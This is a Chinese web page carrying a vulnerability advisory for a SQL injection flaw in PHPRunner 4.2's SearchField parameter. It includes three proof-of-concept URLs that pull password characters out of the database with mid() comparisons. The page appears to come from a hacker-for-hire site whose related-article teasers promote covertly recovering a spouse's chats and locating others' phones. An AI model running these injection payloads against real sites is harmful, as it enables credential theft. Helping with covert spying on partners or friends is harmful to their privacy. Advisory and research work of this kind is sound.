PHPRunner SearchField参数SQL注入漏洞

访客4年前关于黑客接单1123

影响版本:
XLineSoft PHPRunner 4.2
漏洞描述:
BUGTRAQ  ID: 34146
CVE(CAN) ID: CVE-2009-0963,CVE-2009-0964

PHPRunner是一款PHP网页 *** 工具,可以生成读写MySql数据库的PHP网页。

PHPRunner的orders_list.php和users_list.php模块中没有正确地验证对SearchField参数所传送的输入便在SQL查询中使用,远程攻击者可以通过提交恶意查询请求执行SQL注入攻击,完全入侵数据库系统。 <*参考 
http://secuni *** /advisories/34330/
http://marc.info/?l=bugtraq&m=123731019502458&w=2.
*>
SEBUG安全建议:
厂商补丁:

XLineSoft
---------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.xlinesoft.com/.
测试 *** :
[www.sebug.net]
本站提供程序( *** )可能带有攻击性,仅供安全研究与教学之用,风险自负!
http://example.com/output/UserView_list.php?a=search&value=1&SearchFor=abc&SearchOption=Contains&SearchField=Password like   \'%%\')--
http://example.com/output/UserView_list.php?a=search&value=1&SearchFor=abc&SearchOption=Contains&SearchField=mid(Password,1,1)=\'a\')-- \\
http://example.com/output/UserView_list.php?a=search&value=1&SearchFor=abc&SearchOption=Contains&SearchField=mid(Password,1,2)=\'ab\')--


标签: 好话题

相关文章

老公将微信聊天记录恢复 怎么恢复我老公以前删除的微信聊天记录

老公将微信聊天记录恢复 怎么恢复我老公以前删除的微信聊天记录 现在有很多人明明已经和一个人不相爱了,但是依然和他保持一种准时联系的状态。其实和这一个人不相爱了,也未必是放不下。可能有的时候是一种习惯吧...

4399摩尔庄园被黑客攻击后永久下线!第一次听说被干挂的游戏_您的

4399摩尔庄园被黑客攻击后永久下线!第一次听说被干挂的游戏说起4399,许多90后、00后的游戏迷一定不会陌生,在4399上,有许多可玩性超高的游戏,其中,最著名的有摩尔庄园、奥比岛、造梦西游等游戏...

采众家之长分析及改进Cmail漏洞

来源:黑客防线作者:LoveMelody 看了ISNO大虾的《我是如何发现CCProxy漏洞的》,心里痒痒的,也想按照ISNO大虾介绍的方法,依葫芦画瓢的分析分析一个漏洞。分析什么漏洞呢?F.Zh在...

有这样几个情人才是女人的宝贵财富 6种方法

很多人看到这个话题都非常惊讶,或者他们可能认为这是一个花心的女人,因为他们认为女人的花心和男人的花心是一样的,但它的花心有本质的区别,因为一个男人可以再爱一个女人的同时,心里还在想着一些女人,但是女人...

偷偷获取微信好友位置(大牛技术教你定位手机位置)_微信好友

我可以不同意你的观点,但是我誓死捍卫你说话的权力。言行、言行,言是言,行是行,言和行截然不同,办法肯定不同。如果,让那些荒谬的谎言,邪恶的胡说尽情的说;让那些客观、良知、正义之声随便的讲,让所有的声音...

黑客教你定位手机( 黑客教你定位手机位置)_黑客手机定位

目前,大多数手机品牌定制系统都有自己的手机搜索功能,比如iPhone、魅族、华为等品牌。如果其他个人手机品牌没有自己的手机搜索功能,但想要定位手机,只能安装第三方应用。通过第三方应用的手机定位功能,可...